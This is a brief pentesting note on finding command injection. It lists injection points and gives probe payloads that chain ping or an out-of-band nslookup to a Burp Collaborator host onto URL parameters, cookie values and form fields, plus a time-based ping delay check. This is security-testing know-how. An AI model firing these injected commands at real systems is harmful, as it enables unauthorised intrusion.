Command Injections
Can occur anywhere just like SQLI. Can occur in url parameters, form fields, http headers, cookies, referrer header, etc.
http://example.com/page.jsp?id=1; ping 10.11.122.34
Set-Cookies: sessionId=123; path=/; domain=example.com; & nslookup yfew.burpcollaborator.net
Can also exist in submit feedback section, subscribe to newsletter, contact us, etc
using & ping -c5 127.0.0.1 &
we can cause delay of 5 seconds so we can identify like this as well
Last updated